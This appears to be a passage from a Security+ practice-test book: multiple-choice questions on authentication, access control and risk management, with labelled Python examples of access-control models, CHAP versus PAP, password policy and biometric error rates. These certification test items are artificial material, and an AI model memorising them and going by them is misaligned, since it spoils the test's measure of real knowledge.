- 30. You are looking for an authentication method that has one-time passwords and
- works well with the Initiative for Open Authentication. However, the user should
- have unlimited time to use the password. Which of the following would be your best
- choice?
- A. CHAP
- B. TOTP
- C. HOTP
- D. ABAC
- 31. Gerard is trying to find a flexible remote access protocol that can use either TCP or UDP.
- Which of the following should he select?
- A. RADIUS
- B. DIAMETER
- C. TACACS+
- D. TACACS
- 32. Emiliano is considering voice recognition as part of his access control strategy. What is
- one weakness with voice recognition?
- A. People’s voices change.
- B. Systems require training.
- C. High false negative rate
- D. High false positive rate
- 33. You are explaining facial recognition to a colleague. What is the most significant
- drawback to implementing facial recognition?
- A. These systems can be expensive.
- B. These systems can be fooled with facial hair, glasses, etc.
- C. These systems have a high false positive rate.
- D. The systems require a long time to observe a face.
- 34. Mohanned is responsible for account management at his company. He is very concerned
- about hacking tools that rely on rainbow tables. Which of the following would be most
- effective in mitigating this threat?
- A. Password complexity
- B. Password age
- C. Password expiration
- D. Password length
- 35. Mary is a security administrator for a mid-sized company. She is trying to securely
- off-board employees. What should she do with the network account for an employee who is
- being off-boarded?
- A. Disable the account.
- B. Delete the account.
- C. Change the account password.
- D. Leave the account as is.
- 36. Your supervisor tells you to implement security based on your users’ physical characteris-
- tics. Under which type of security would hand scanning and retina scanning fall?
- A. CHAP
- B. Multifactor
- C. Biometrics
- D. Token
- 37. What port does TACACS use?
- A. TCP 143
- B. TCP and UDP 49
- C. TCP 443
- D. UDP 53
- 38. A company-wide policy is being created to define various security levels. Which of the
- following systems of access control would use documented security levels like Confidential
- or Secret for information?
- A. RBAC
- B. MAC
- C. DAC
- D. BBC
- 39. There is a common security issue that is extremely hard to control in large environments.
- It occurs when a user has more computer rights, permissions, and privileges than what is
- required for the tasks the user needs to fulfill. This is the opposite of what principle?
- A. Separation of duties
- B. Least privileges
- C. Transitive trust
- D. Account management
- 40. Users in your network are able to assign permissions to their own shared resources.
- Which of the following access control models is used in your network?
- A. DAC
- B. RBAC
- C. MAC
- D. ABAC
- 41. John is performing a port scan of a network as part of a security audit. He notices that the
- domain controller is using secure LDAP. Which of the following ports would lead him to
- that conclusion?
- A. 53
- B. 389
- C. 443
- D. 636
- 42. Which of the following access control methods grants permissions based on the user’s
- position in the organization?
- A. MAC
- B. RBAC
- C. DAC
- D. ABAC
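Questions 8, 38, 40 and 42 contrast MAC, DAC and RBAC. As an added example, not from the practice test, the following Python evaluates the same kind of request under each model: MAC compares documented labels and the user cannot override the outcome (no read up, and no write down so higher-labelled data cannot leak into a lower-labelled file), DAC lets the object's owner hand out permissions, and RBAC ties permissions to positions so a transfer swaps roles rather than accumulating rights. The Level names, users, roles and resources are constructed for the example.

```python
from enum import IntEnum


class Level(IntEnum):
    """Ordered sensitivity labels of the kind a MAC policy documents."""
    UNCLASSIFIED = 0
    CONFIDENTIAL = 1
    SECRET = 2
    TOP_SECRET = 3


def mac_allows(clearance: Level, label: Level, action: str) -> bool:
    """Mandatory access control, Bell-LaPadula style: the OS compares labels and the
    user cannot override the result. Read needs clearance >= label (no read up);
    write needs clearance <= label (no write down)."""
    if action == "read":
        return clearance >= label
    if action == "write":
        return clearance <= label
    raise ValueError(f"unknown action {action!r}")


class DacObject:
    """Discretionary access control: the owner of a resource manages its ACL."""

    def __init__(self, owner: str):
        self.owner = owner
        self.acl = {owner: {"read", "write"}}

    def grant(self, by: str, to: str, perms: set) -> None:
        if by != self.owner:
            raise PermissionError(f"{by} does not own this object")
        self.acl.setdefault(to, set()).update(perms)

    def allows(self, user: str, action: str) -> bool:
        return action in self.acl.get(user, set())


class Rbac:
    """Role-based access control: permissions attach to positions, users to positions."""

    def __init__(self):
        self.role_perms = {}    # role -> {(action, resource)}
        self.user_roles = {}    # user -> {role}

    def add_role(self, role: str, perms) -> None:
        self.role_perms.setdefault(role, set()).update(perms)

    def assign(self, user: str, role: str) -> None:
        self.user_roles.setdefault(user, set()).add(role)

    def revoke(self, user: str, role: str) -> None:
        self.user_roles.get(user, set()).discard(role)

    def allows(self, user: str, action: str, resource: str) -> bool:
        return any((action, resource) in self.role_perms.get(r, set())
                   for r in self.user_roles.get(user, ()))


def demo() -> dict:
    """Constructed scenario: comparable requests evaluated under each model."""
    results = {}
    results["mac_read_up"] = mac_allows(Level.CONFIDENTIAL, Level.SECRET, "read")
    results["mac_read_down"] = mac_allows(Level.SECRET, Level.CONFIDENTIAL, "read")
    results["mac_write_down"] = mac_allows(Level.SECRET, Level.CONFIDENTIAL, "write")

    share = DacObject(owner="alice")
    share.grant("alice", "bob", {"read"})          # owner decides, not the OS
    results["dac_bob_reads"] = share.allows("bob", "read")
    results["dac_bob_writes"] = share.allows("bob", "write")

    rbac = Rbac()
    rbac.add_role("teller", {("read", "ledger")})
    rbac.add_role("auditor", {("read", "ledger"), ("read", "audit-log")})
    rbac.assign("carol", "teller")
    results["rbac_teller_ledger"] = rbac.allows("carol", "read", "ledger")
    results["rbac_teller_auditlog"] = rbac.allows("carol", "read", "audit-log")
    rbac.revoke("carol", "teller")                 # transfer: swap roles, no privilege creep
    rbac.assign("carol", "auditor")
    results["rbac_after_transfer"] = rbac.allows("carol", "read", "audit-log")
    return results
```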
- 43. Which of the following can be used as a means for dual-factor authentication?
- A. Password and PIN number
- B. RADIUS and L2TP
- C. LDAP and WPA
- D. Iris scan and password
- 44. Kerberos uses which of the following to issue tickets?
- A. Authentication service
- B. Certificate authority
- C. Ticket-granting service
- D. Key distribution center
- 45. A company requires that a user’s credentials include providing something they know and
- something they are in order to gain access to the network. Which of the following types of
- authentication is being described?
- A. Token
- B. Two-factor
- C. Kerberos
- D. Biometrics
- 46. Samantha is looking for an authentication method that incorporates the X.509 standard
- and will allow authentication to be digitally signed. Which of the following authentication
- methods would best meet these requirements?
- A. Certificate-based authentication
- B. OAUTH
- C. Kerberos
- D. Smart cards
- 47. Your company relies heavily on cloud and SaaS service providers such as salesforce.com,
- Office365, and Google. Which of the following would you have security concerns about?
- A. LDAP
- B. TACACS+
- C. SAML
- D. Transitive trust
- 48. Greg is responsible for database security for his company. He is concerned about
- authentication and permissions. Which of the following should be his first step?
- A. Implement minimum password length.
- B. Implement password lockout.
- C. Conduct a permissions audit.
- D. Ensure least privileges.
- 49. Which of the following is a step in account maintenance?
- A. Implement two-factor authentication.
- B. Check for time of day restrictions.
- C. Review onboarding processes.
- D. Check to see that all accounts are for active employees.
- 50. Tyrell works as a security officer for a mid-sized bank. All the employees only work in the
- office; there are no employees who work remotely or travel for company business. Tyrell
- is concerned about someone using an employee’s login credentials to access the bank’s
- network. Which of the following would be most effective in mitigating this threat?
- A. Kerberos authentication
- B. TOTP
- C. Location-based policies
- D. Group-based access control
- 51. Henry is an employee at Acme Company. The company requires him to change his
- password every three months. He has trouble remembering new passwords, so he keeps
- switching between just two passwords. Which policy would be most effective in
- preventing this?
- A. Password complexity
- B. Password history
- C. Password length
- D. Password age
- 52. Sheila is concerned that some users on her network may be accessing files that they should
- not—specifically, files that are not required for their job tasks. Which of the following
- would be most effective in determining if this is happening?
- A. Usage auditing and review
- B. Permissions auditing and review
- C. Account maintenance
- D. Policy review
- 53. In which of the following scenarios would using a shared account pose the least security
- risk?
- A. For a group of tech support personnel
- B. For guest Wi-Fi access
- C. For students logging in at a university
- D. For accounts with few privileges
- 54. Which of the following is not a part of password complexity?
- A. Using both uppercase and lowercase letters
- B. Minimum password length
- C. Using numbers
- D. Using symbols (such as $, #, etc.)
- 55. Jane is setting up login accounts for federated identities. She wants to avoid requiring
- the users to remember login credentials and allow them to use their logins from the
- originating network. Which of the following technologies would be most suitable for
- implementing this?
- A. Credential management
- B. OAUTH
- C. Kerberos
- D. Shibboleth
- 56. Sam is responsible for password management at a large company. Sometimes users cannot
- recall their passwords. What would be the best solution for him to address this?
- A. Changing password history length
- B. Implementing password recovery
- C. Eliminating password complexity
- D. Lengthening password age
- 57. You are a security administrator for an insurance company. You have discovered that
- there are a few active accounts for employees who left the company over a year ago.
- Which of the following would best address this issue?
- A. Password complexity
- B. Offboarding procedures
- C. Onboarding procedures
- D. Password expiration
- 58. Maria is responsible for security at a small company. She is concerned about unauthorized
- devices being connected to the network. She is looking for a device authentication process.
- Which of the following would be the best choice for her?
- A. CHAP
- B. Kerberos
- C. 802.11i
- D. 802.1x
- 59. Laura is a security admin for a mid-sized mortgage company. She wants to ensure that the
- network is using the most secure login and authentication scheme possible. Which of the
- following would be her best choice?
- A. Iris scanning
- B. Fingerprint scanning
- C. Multifactor authentication
- D. Smart cards
- 60. Charles is a CISO for an insurance company. He recently read about an attack wherein
- an attacker was able to enumerate all the network resources, and was able to make some
- resources unavailable. All this was done by exploiting a single protocol. Which protocol
- should Charles secure to mitigate this attack?
- A. SNMP
- B. LDAP
- C. HTTP
- D. DHCP
- 61. Robert is using PAP for authentication in his network. What is the most significant
- weakness in PAP?
- A. Unsigned authentication
- B. Single factor
- C. Credentials sent in cleartext
- D. PAP does not support TACACS+.
- 62. You are responsible for account access control and authorization at a large university.
- There are approximately 30,000 students and 1,200 faculty/staff for whom you must
- manage accounts. Which of the following would be the best access control/account
- management approach?
- A. Group-based
- B. Location-based
- C. MAC
- D. DAC
- 63. Which of the following is most important in managing account permissions?
- A. Account recertification
- B. Usage auditing
- C. Standard naming conventions
- D. Account recovery
- 64. Which of the following would be the best choice for naming the account of John Smith,
- who is a domain administrator?
- A. dm_jsmith
- B. jsmithAdmin
- C. AdministratorSmith
- D. jsmith
- 65. Megan is very concerned about file system security on her network servers. Which of the
- following is the most basic form of file system security?
- A. Encryption
- B. Access control
- C. Auditing
- D. RAID
- 66. Karen is responsible for account security in her company. She has discovered a
- receptionist whose account has a six-character password that has not been changed in two years,
- and her password history is not being maintained. What is the most significant problem
- with this account?
- A. Nothing, this is adequate for a low-security position.
- B. The password length is the most significant problem.
- C. The lack of password history is the most significant problem.
- D. The age of the password is the most significant problem.
- 67. When you’re offboarding an employee, which of the following is the first thing you should do?
- A. Audit their computer.
- B. Conduct an out-processing questionnaire.
- C. Disable accounts.
- D. Delete accounts.
- 68. Which of the following is a difference between TACACS and TACACS+?
- A. TACACS uses TCP, TACACS+ uses UDP
- B. TACACS uses UDP, TACACS+ uses TCP
- C. TACACS uses TCP or UDP, TACACS+ uses UDP
- D. TACACS uses UDP, TACACS+ uses UDP or TCP
- 69. Greg is considering using CHAP or MS-CHAPv2 for authenticating remote users. Which
- of the following is a major difference between the two protocols?
- A. CHAP uses a hash for the challenge, MS-CHAPv2 uses AES.
- B. CHAP provides mutual authentication, MS-CHAPv2 does not.
- C. CHAP uses AES for the challenge, MS-CHAPv2 uses a hash.
- D. MS-CHAPv2 provides mutual authentication, CHAP does not.
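Questions 3, 61, 69 and 81 all hinge on what PAP and CHAP put on the wire. The following Python is an added example (not from the practice test) of the RFC 1994 CHAP exchange, including the periodic re-challenge during a session and the one-time use of each challenge that makes a captured response useless for replay, next to the RFC 1334 PAP Authenticate-Request that carries the password itself. The peer name, the shared secret and the 16-byte challenge length are constructed for the example; MS-CHAPv2's mutual authentication is not modelled.

```python
import hashlib
import hmac
import os


def chap_digest(ident: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 CHAP with MD5: hash(Identifier || secret || Challenge Value)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()


class ChapAuthenticator:
    """Server side. Knows each peer's secret; issues a fresh random challenge per round."""

    def __init__(self, secrets: dict):
        self.secrets = secrets
        self.ident = 0
        self.outstanding = {}          # ident -> challenge, consumed by the first response

    def challenge(self) -> dict:
        self.ident = (self.ident + 1) & 0xFF
        value = os.urandom(16)
        self.outstanding[self.ident] = value
        return {"code": "Challenge", "id": self.ident, "value": value}

    def verify(self, response: dict) -> bool:
        challenge = self.outstanding.pop(response["id"], None)
        if challenge is None:          # unknown id, or a replayed response
            return False
        secret = self.secrets.get(response["name"])
        if secret is None:
            return False
        expected = chap_digest(response["id"], secret, challenge)
        return hmac.compare_digest(expected, response["value"])


class ChapPeer:
    """Client side. Proves knowledge of the secret without ever sending it."""

    def __init__(self, name: str, secret: bytes):
        self.name = name
        self.secret = secret

    def respond(self, challenge: dict) -> dict:
        return {"code": "Response", "id": challenge["id"], "name": self.name,
                "value": chap_digest(challenge["id"], self.secret, challenge["value"])}


def pap_authenticate_request(peer_id: str, password: str) -> dict:
    """RFC 1334 PAP: the Authenticate-Request carries the password in the clear."""
    return {"code": "Authenticate-Request", "peer_id": peer_id, "password": password}


def secret_on_wire(messages, secret: bytes) -> bool:
    """What a sniffer sees: does the secret appear verbatim in any captured field?"""
    for msg in messages:
        for value in msg.values():
            blob = value if isinstance(value, bytes) else str(value).encode()
            if secret in blob:
                return True
    return False


def chap_session(rounds: int, peer_secret: bytes, server_secret: bytes):
    """Run `rounds` challenge/response exchanges (CHAP re-challenges during a live
    session) and return (per-round verdicts, every message as seen on the wire)."""
    auth = ChapAuthenticator({"alice": server_secret})
    peer = ChapPeer("alice", peer_secret)
    capture, verdicts = [], []
    for _ in range(rounds):
        chal = auth.challenge()
        resp = peer.respond(chal)
        capture += [chal, resp]
        verdicts.append(auth.verify(resp))
    return verdicts, capture
```

Because each response is bound to a fresh challenge and each challenge is consumed on first use, a hijacker who captured one round cannot answer the next re-challenge; the weakness that remains is that the secret must be stored in a form the authenticator can hash, which is why CHAP needs the plaintext (or reversibly stored) secret on the server.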
- 70. Terrance is looking for a physical access solution that uses asymmetric cryptography
- (public key cryptography) to authorize the user. What type of solution is this?
- A. Asynchronous password token
- B. Challenge response token
- C. TOTP token
- D. Static password token
- 71. Which access control model is based on the Trusted Computer System Evaluation Criteria
- (TCSEC)?
- A. ABAC
- B. MAC
- C. RBAC
- D. DAC
- 72. Mary is responsible for the security of database servers at a mortgage company. The
- servers are Windows Server 2016. She is concerned about file system security. Which of the
- following Microsoft features would be most helpful to her in implementing file system
- security?
- A. Password policies
- B. EFS
- C. Account lockout
- D. UAC
- 73. Santiago manages database security for a university. He is concerned about ensuring that
- appropriate security measures are implemented. Which of the following would be most
- important to database security?
- A. Password policies
- B. Antivirus
- C. EFS
- D. Access control policies
- 74. Ingrid is reviewing her company’s recertification policy. Which of the following is the best
- reason to recertify?
- A. To audit usage
- B. To enhance onboarding
- C. To audit permissions
- D. To manage credentials
- 75. Emma is concerned about credential management. Users on her network often have over a
- half-dozen passwords to remember. She is looking for a solution to this problem. Which of
- the following would be the best way to address this issue?
- A. Implement a manager.
- B. Use shorter passwords.
- C. Implement OAUTH.
- D. Implement Kerberos.
- 76. Magnus is concerned about someone using a password cracker on computers in his
- company. He is concerned that crackers will attempt common passwords in order to log in to
- a system. Which of the following would be best for mitigating this threat?
- A. Password age restrictions
- B. Password minimum length requirements
- C. Account lockout policies
- D. Account usage auditing
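Questions 28, 34, 51, 54, 66 and 76 are all account policy enforcement. The following Python is an added example, not part of the practice test, of a small directory that enforces length and complexity, keeps a per-user salted PBKDF2 history so a user cannot toggle between two passwords (the same salted, slow hashing is what makes rainbow tables useless against the stored hashes), expires passwords by age, and locks an account after repeated failures. The policy values, the account and the FakeClock are constructed for the example; a real directory would persist the records and pick a PBKDF2 round count its hardware affords.

```python
import hashlib
import hmac
import os
import re
from dataclasses import dataclass, field

PBKDF2_ROUNDS = 100_000     # slow, salted hashing defeats precomputed (rainbow) tables


@dataclass
class Policy:
    min_length: int = 12
    min_classes: int = 3            # of lower, upper, digit, symbol
    history_depth: int = 5          # earlier passwords remembered, besides the current one
    max_age_seconds: int = 90 * 86400
    lockout_threshold: int = 5      # failed attempts before lockout
    lockout_seconds: int = 15 * 60


class PolicyError(ValueError):
    pass


def check_complexity(password: str, policy: Policy) -> None:
    if len(password) < policy.min_length:
        raise PolicyError(f"shorter than {policy.min_length} characters")
    classes = sum(bool(re.search(p, password))
                  for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
    if classes < policy.min_classes:
        raise PolicyError(f"needs {policy.min_classes} character classes")


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


@dataclass
class Account:
    name: str
    salt: bytes = b""
    digest: bytes = b""
    changed_at: float = 0.0
    history: list = field(default_factory=list)   # [(salt, digest)] of earlier passwords
    failures: int = 0
    locked_until: float = 0.0


class Directory:
    def __init__(self, policy: Policy, clock):
        self.policy = policy
        self.clock = clock          # callable returning unix time; injectable for tests

    def set_password(self, acct: Account, new_password: str) -> None:
        check_complexity(new_password, self.policy)
        previous = ([(acct.salt, acct.digest)] if acct.digest else []) + acct.history
        for salt, digest in previous:   # rehash with each old salt; history stores no plaintext
            if hmac.compare_digest(hash_password(new_password, salt), digest):
                raise PolicyError("password was used recently")
        if acct.digest:
            acct.history = previous[: self.policy.history_depth]
        acct.salt = os.urandom(16)
        acct.digest = hash_password(new_password, acct.salt)
        acct.changed_at = self.clock()
        acct.failures = 0

    def login(self, acct: Account, password: str) -> str:
        now = self.clock()
        if now < acct.locked_until:
            return "locked"
        if not hmac.compare_digest(hash_password(password, acct.salt), acct.digest):
            acct.failures += 1
            if acct.failures >= self.policy.lockout_threshold:
                acct.locked_until = now + self.policy.lockout_seconds
                acct.failures = 0
                return "locked"
            return "bad-password"
        acct.failures = 0
        if now - acct.changed_at > self.policy.max_age_seconds:
            return "expired"
        return "ok"


class FakeClock:
    """Constructed clock so the example runs deterministically offline."""

    def __init__(self, start: float = 1_700_000_000.0):
        self.now = start

    def __call__(self) -> float:
        return self.now
```

Note that the lockout returns "locked" even when the correct password is presented during the lockout window, which is what stops an online guessing tool, and that the history check never needs the old plaintexts: the candidate is rehashed under each stored salt and compared in constant time.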
- 77. Lucas is looking for an XML-based open standard for exchanging authentication
- information. Which of the following would best meet his needs?
- A. SAML
- B. OAUTH
- C. RADIUS
- D. NTLM
- 78. Which of the following processes transpires when a user provides a correct username and
- password?
- A. Identification
- B. Authentication
- C. Authorization
- D. Accounting
- 79. Min-seo is looking for a type of access control that enforces authorization rules by the
- operating system. Users cannot override authentication or access control policies. Which
- of the following best fits this description?
- A. DAC
- B. MAC
- C. RBAC
- D. ABAC
- 80. Hinata is considering biometric access control solutions for her company. She is concerned
- about the crossover error rate (CER). Which of the following most accurately describes
- the CER?
- A. The rate of false acceptance
- B. The rate of false rejection
- C. The point at which false rejections outpace false acceptances
- D. The point at which false rejections and false acceptances are equal
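Questions 15, 23 and 80 define FAR, FRR and the crossover error rate. The following Python is an added example (not from the practice test) that computes all three from a threshold sweep over constructed match scores: the crossover is the threshold where FAR and FRR meet, and the last function shows the trade-off a high-security deployment makes when it caps FAR and accepts a higher FRR. The score lists are made up for the example, not measurements from any product.

```python
# Constructed match scores (0 = no match, 1 = perfect) from a hypothetical sensor:
# ten genuine-user attempts and ten impostor attempts.
GENUINE_SCORES = [0.92, 0.88, 0.81, 0.77, 0.74, 0.70, 0.66, 0.61, 0.55, 0.48]
IMPOSTOR_SCORES = [0.12, 0.20, 0.27, 0.33, 0.39, 0.45, 0.52, 0.58, 0.63, 0.69]

# Candidate decision thresholds, swept in steps of 0.05.
THRESHOLDS = [i / 100 for i in range(0, 101, 5)]


def error_rates(genuine, impostor, threshold):
    """A match is accepted when score >= threshold.
    FAR: fraction of impostor attempts accepted (false positives).
    FRR: fraction of genuine attempts rejected (false negatives)."""
    far = sum(s >= threshold for s in impostor) / len(impostor)
    frr = sum(s < threshold for s in genuine) / len(genuine)
    return far, frr


def crossover(genuine, impostor, thresholds):
    """Crossover error rate: the threshold where FAR and FRR are (closest to) equal.
    Returns (threshold, far, frr); the lower the rates at that point, the better the
    sensor, which is why CER is used to compare products."""
    best = None
    for t in thresholds:
        far, frr = error_rates(genuine, impostor, t)
        if best is None or abs(far - frr) < abs(best[1] - best[2]):
            best = (t, far, frr)
    return best


def threshold_for_max_far(genuine, impostor, max_far, thresholds):
    """Tune for a high-security door: the lowest threshold whose FAR does not exceed
    max_far, together with the FRR users will pay for it. Returns (threshold, far, frr),
    or None if no threshold meets the target."""
    for t in thresholds:
        far, frr = error_rates(genuine, impostor, t)
        if far <= max_far:
            return t, far, frr
    return None
```

Raising the threshold moves errors from FAR to FRR and vice versa; a product is only usable if the rates are both acceptable at the same threshold, which the crossover point summarises in a single number.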
- 81. Joshua is looking for an authentication protocol that would be effective at stopping
- session hijacking. Which of the following would be his best choice?
- A. CHAP
- B. PAP
- C. SPAP
- D. RADIUS
- 82. David is trying to select an authentication method for his company. He needs one that will
- support REST as well as multiple web-based and mobile clients. Which of the following
- would be his best choice?
- A. Shibboleth
- B. RADIUS
- C. OpenID Connect
- D. OAuth
- 83. Phillip is examining options for controlling physical access to the server room at his
- company. He wants a hands-free solution. Which of the following would be his best choice?
- A. Smart cards
- B. Proximity cards
- C. Tokens
- D. Fingerprint scanner
- 84. Which of the following is the most significant disadvantage of federated identities?
- A. They cannot be used with Kerberos.
- B. They don’t implement least privileges.
- C. Poor password management
- D. Transitive trust
- 85. Max is implementing type II authentication for his company. Which of the following
- would be an example of type II authentication?
- A. Strong passwords
- B. Retinal scan
- C. Smart cards
- D. Timed one-time passwords
- 86. Nicole is implementing a server authentication method that depends on a TPM in the
- server. Which of the following best describes this approach?
- A. Hardware-based access control
- B. Software-based access control
- C. Digital certificate–based access control
- D. Chip-based access control
- Chapter 5: Risk Management
- The CompTIA Security+ Exam SY0-501 topics covered in this chapter include the following:
- ✓ 5.1 Explain the importance of policies, plans and procedures related to organizational security.
- ■ Standard operating procedure
- ■ Agreement types
- ■ ■ BPA
- ■ ■ SLA
- ■ ■ ISA
- ■ ■ MOU/MOA
- ■ Personnel management
- ■ ■ Mandatory vacations
- ■ ■ Job rotation
- ■ ■ Separation of duties
- ■ ■ Clean desk
- ■ ■ Background checks
- ■ ■ Exit interviews
- ■ ■ Role-based awareness training
- ■ ■ ■ Data owner
- ■ ■ ■ System administrator
- ■ ■ ■ System owner
- ■ ■ ■ User
- ■ ■ ■ Privileged user
- ■ ■ ■ Executive user
- ■ ■ NDA
- ■ ■ Onboarding
- ■ ■ Continuing education
- ■ ■ Acceptable use policy/rules of behavior
- ■ ■ Adverse actions
- ■ General security policies
- ■ ■ Social media networks/applications
- ■ ■ Personal email
- ✓ 5.2 Summarize business impact analysis concepts.
- ■ RTO/RPO
- ■ MTBF
- ■ MTTR
- ■ Mission-essential functions
- ■ Identification of critical systems
- ■ Single point of failure
- ■ Impact
- ■ ■ Life
- ■ ■ Property
- ■ ■ Safety
- ■ ■ Finance
- ■ ■ Reputation
- ■ Privacy impact assessment
- ■ Privacy threshold assessment
- ✓ 5.3 Explain risk management processes and concepts.
- ■ Threat assessment
- ■ ■ Environmental
- ■ ■ Manmade
- ■ ■ Internal vs external
- ■ Risk assessment
- ■ ■ SLE
- ■ ■ ALE
- ■ ■ ARO
- ■ ■ Asset value
- ■ ■ Risk register
- ■ ■ Likelihood of occurrence
- ■ ■ Supply chain assessment
- ■ ■ Impact
- ■ ■ Quantitative
- ■ ■ Qualitative
- ■ ■ Testing
- ■ ■ ■ Penetration testing authorization
- ■ ■ ■ Vulnerability testing authorization
- ■ ■ Risk response techniques
- ■ ■ ■ Accept
- ■ ■ ■ Transfer
- ■ ■ ■ Avoid
- ■ ■ ■ Mitigate
- ■ Change management
- ✓ 5.4 Given a scenario, follow incident response procedures.
- ■ Incident response plan
- ■ ■ Documented incident types/category definitions
- ■ ■ Roles and responsibilities
- ■ ■ Reporting requirements/escalation
- ■ ■ Cyber-incident response teams
- ■ ■ Exercise
- ■ Incident response process
- ■ ■ Preparation
- ■ ■ Identification
- ■ ■ Containment
- ■ ■ Eradication
- ■ ■ Recovery
- ■ ■ Lessons learned
- ✓ 5.5 Summarize basic concepts of forensics.
- ■ Order of volatility
- ■ Chain of custody
- ■ Legal hold
- ■ Data acquisition
- ■ ■ Capture system image
- ■ ■ Network traffic and logs
- ■ ■ Capture video
- ■ ■ Record time offset
- ■ ■ Take hashes
- ■ ■ Screenshots
- ■ ■ Witness interviews
- ■ Preservation
- ■ Recovery
- ■ Strategic intelligence/counterintelligence gathering
- ■ ■ Active logging
- ■ Track man-hours
- ✓ 5.6 Explain disaster recovery and continuity of operation concepts.
- ■ Recovery sites
- ■ ■ Hot site
- ■ ■ Warm site
- ■ ■ Cold site
- ■ Order of restoration
- ■ Backup concepts
- ■ ■ Differential
- ■ ■ Incremental
- ■ ■ Snapshots
- ■ ■ Full
- ■ Geographic considerations
- ■ ■ Off-site backups
- ■ ■ Distance
- ■ ■ Location selection
- ■ ■ Legal implications
- ■ ■ Data sovereignty
- ■ Continuity of operation planning
- ■ ■ Exercises/tabletop
- ■ ■ After-action reports
- ■ ■ Failover
- ■ ■ Alternate processing sites
- ■ ■ Alternate business practices
- ✓ 5.7 Compare and contrast various types of controls.
- ■ Deterrent
- ■ Preventive
- ■ Detective
- ■ Corrective
- ■ Compensating
- ■ Technical
- ■ Administrative
- ■ Physical
- ✓ 5.8 Given a scenario, carry out data security and privacy practices.
- ■ Data destruction and media sanitization
- ■ ■ Burning
- ■ ■ Shredding
- ■ ■ Pulping
- ■ ■ Pulverizing
- ■ ■ Degaussing
- ■ ■ Purging
- ■ ■ Wiping
- ■ Data sensitivity labeling and handling
- ■ ■ Confidential
- ■ ■ Private
- ■ ■ Public
- ■ ■ Proprietary
- ■ ■ PII
- ■ ■ PHI
- ■ Data roles
- ■ ■ Owner
- ■ ■ Steward/custodian
- ■ ■ Privacy officer
- ■ Data retention
- ■ Legal and compliance
- 1. You are a manager of a bank and you suspect one of your tellers has stolen money from
- their station. After talking with your supervisor, you place the employee on leave with
- pay, suspend their computer account, and obtain their proximity card and keys to the
- building. Which of the following policies did you follow?
- A. Mandatory vacations
- B. Exit interviews
- C. Adverse actions
- D. Onboarding
- 2. Which of the following principles stipulates that multiple changes to a computer system
- should not be made at the same time?
- A. Due diligence
- B. Acceptable use
- C. Change management
- D. Due care
- 3. Why are penetration tests often not advised?
- A. It can be disruptive for the business activities.
- B. It is able to measure and authenticate the efficiency of a company’s defensive
- mechanisms.
- C. It’s able to find both known and unknown hardware or software weaknesses.
- D. It permits the exploration of real risks and gives a precise depiction of a company’s IT
- infrastructure security posture at any given time.
- 4. You are a security engineer and discovered an employee using the company’s computer
- systems to operate their small business. The employee installed their personal software
- on the company’s computer and is using the computer hardware, such as the USB port.
- What policy would you recommend the company implement to prevent any risk of the
- company’s data and network being compromised?
- A. Acceptable use policy
- B. Clean desk policy
- C. Mandatory vacation policy
- D. Job rotation policy
- 5. What should be done to back up tapes that are stored off-site?
- A. Generate a file hash for each backup file.
- B. Scan the backup data for viruses.
- C. Perform a chain of custody on the backup tape.
- D. Encrypt the backup data.
- 6. Which recovery site is the easiest to test?
- A. Warm site
- B. Cold site
- C. Hot site
- D. Medium site
- 7. Katelyn is a network technician for a manufacturing company. She is testing network
- forensic capture software and plugs her laptop into an Ethernet switch port and
- begins capturing network traffic. Later she begins to analyze the data and notices some
- broadcast and multicast packets, as well as her own laptop’s network traffic. Which of
- the following statements best describes why Katelyn was unable to capture all network
- traffic on the switch?
- A. Each port on the switch is an isolated broadcast domain.
- B. Each port on the switch is an isolated collision domain.
- C. Promiscuous mode must be enabled on the NIC.
- D. Promiscuous mode must be disabled on the NIC.
- 8. Which of the following is not a step of the incident response process?
- A. Snapshot
- B. Preparation
- C. Recovery
- D. Containment
- 9. Which of the following is another term for technical controls?
- A. Access controls
- B. Logical controls
- C. Detective controls
- D. Preventive controls
- 10. You are a security manager for your company and need to reduce the risk of employees
- working in collusion to embezzle funds. Which of the following policies would you
- implement?
- A. Mandatory vacations
- B. Clean desk
- C. NDA
- D. Continuing education
- 11. You are a security administrator, and your manager has asked you about protecting
- the privacy of personally identifiable information (PII) that is collected. Which of the
- following would be the best option to fulfill the request?
- A. PIA
- B. BIA
- C. RTO
- D. SPF
- 12. Which of the following plans best identifies critical systems and components to ensure the
- assets are protected?
- A. DRP
- B. BCP
- C. IT contingency plan
- D. Succession plan
- 13. After your company implemented a clean desk policy, you have been asked to secure
- physical documents every night. Which of the following would be the best solution?
- A. Department door lock
- B. Locking cabinets and drawers
- C. Proximity card
- D. Onboarding
- 14. Your manager has instructed the team to test certain systems based on the business
- continuity plan to ensure they are operating properly. The manager wants to ensure there
- are no overlaps in the plan before implementing the test. Which continuity of operation
- planning concept is your manager referring to?
- A. After-action report
- B. Failover
- C. Eradication
- D. Tabletop exercise
- 15. Which of the following is an example of PHI?
- A. Passport number
- B. Criminal record
- C. Fingerprints
- D. Name of school attended
- 16. Which of the following techniques attempts to predict the likelihood a threat will occur
- and assigns monetary values should a loss occur?
- A. Change management
- B. Vulnerability assessment
- C. Qualitative risk assessment
- D. Quantitative risk assessment
- 17. Your competitors are offering a new service that is predicted to sell strongly. After much
- careful research, your company has decided not to launch a competing service due to the
- uncertainty of the market and the enormous investment required. Which of the following
- best describes the company’s decision?
- A. Risk transfer
- B. Risk avoidance
- C. Risk acceptance
- D. Risk mitigation
- 18. Which of the following agreements is less formal than a traditional contract but still has a
- certain level of importance to all parties involved?
- A. SLA
- B. BPA
- C. ISA
- D. MOU
- 19. Your company is considering moving its mail server to a hosting company. This will help
- reduce hardware and server administrator costs at the local site. Which of the following
- documents would formally state the reliability and recourse if the reliability is not met?
- A. MOU
- B. SLA
- C. ISA
- D. BPA
- 20. You have an asset that is valued at $16,000, the exposure factor of a risk affecting that
- asset is 35%, and the annualized rate of occurrence is 75%. What is the SLE?
- A. $5,600
- B. $5,000
- C. $4,200
- D. $3,000
- 21. During a meeting, you present management with a list of access controls used on your
- network. Which of the following controls is an example of a corrective control?
- A. IDS
- B. Audit logs
- C. Antivirus software
- D. Router
- 22. You are the new security administrator and have discovered your company lacks deterrent
- controls. Which of the following would you install that satisfies your needs? (Choose
- two.)
- A. Lighting
- B. Motion sensor
- C. No trespassing signs
